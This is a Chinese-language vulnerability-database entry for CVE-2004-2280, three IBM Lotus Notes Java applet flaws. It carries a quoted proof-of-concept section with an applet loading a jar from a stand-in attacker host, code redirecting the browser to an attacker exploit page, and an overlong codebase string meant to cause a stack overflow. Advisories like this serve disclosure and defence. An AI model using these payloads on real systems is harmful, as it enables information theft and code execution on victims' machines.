IBM Lotus Notes多个未明安全漏洞

IBM Lotus Notes多个未明安全漏洞

漏洞ID 1108042 漏洞类型 未知
发布时间 2004-07-13 更新时间 2005-10-20
图片[1]-IBM Lotus Notes多个未明安全漏洞-安全小百科CVE编号 CVE-2004-2280
图片[2]-IBM Lotus Notes多个未明安全漏洞-安全小百科CNNVD-ID CNNVD-200412-993
漏洞平台 Unix CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-993
|漏洞详情
LotusDomino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和MicrosoftWindows操作系统平台下。IBMLotusNotes存在三个未明漏洞,远程攻击者可以利用这些漏洞破坏LotusNotes。目前没有详细漏洞细节提供。
|漏洞EXP
source: http://www.securityfocus.com/bid/10704/info

IBM Lotus Notes is affected by three vulnerabilities concerning Java applets.

An attacker can exploit these issues to disclose potentially sensitive information, cause a web browser to open an arbitrary web page, and cause a stack-based buffer overflow that may be exploited to execute arbitrary code.

IBM has confirmed these vulnerabilities and has stated that they are currently under investigation. IBM problem reports for these vulnerabilities are KSPR5YS6GR, KSPR62F4D3, and KSPR62F4KN. 

<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>

Arbitrary browser opening:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}

Stack-based buffer overflow:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>
|参考资料

来源:OSVDB
名称:8418
链接:http://www.osvdb.org/8418
来源:www-1.ibm.com
链接:http://www-1.ibm.com/support/docview.wss?rs=475&context;=SSKTWP&q1;=Java&uid;=swg21173910&loc;=en_US&cs;=utf-8〈=en
来源:SECUNIA
名称:12046
链接:http://secunia.com/advisories/12046
来源:BID
名称:10704
链接:http://www.securityfocus.com/bid/10704
来源:NSFOCUS
名称:6700
链接:http://www.nsfocus.net/vulndb/6700

相关推荐: Macallan Mail Solution Web接口验证绕过漏洞

Macallan Mail Solution Web接口验证绕过漏洞 漏洞ID 1107713 漏洞类型 访问验证错误 发布时间 2004-02-12 更新时间 2005-10-20 CVE编号 CVE-2004-2071 CNNVD-ID CNNVD-200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享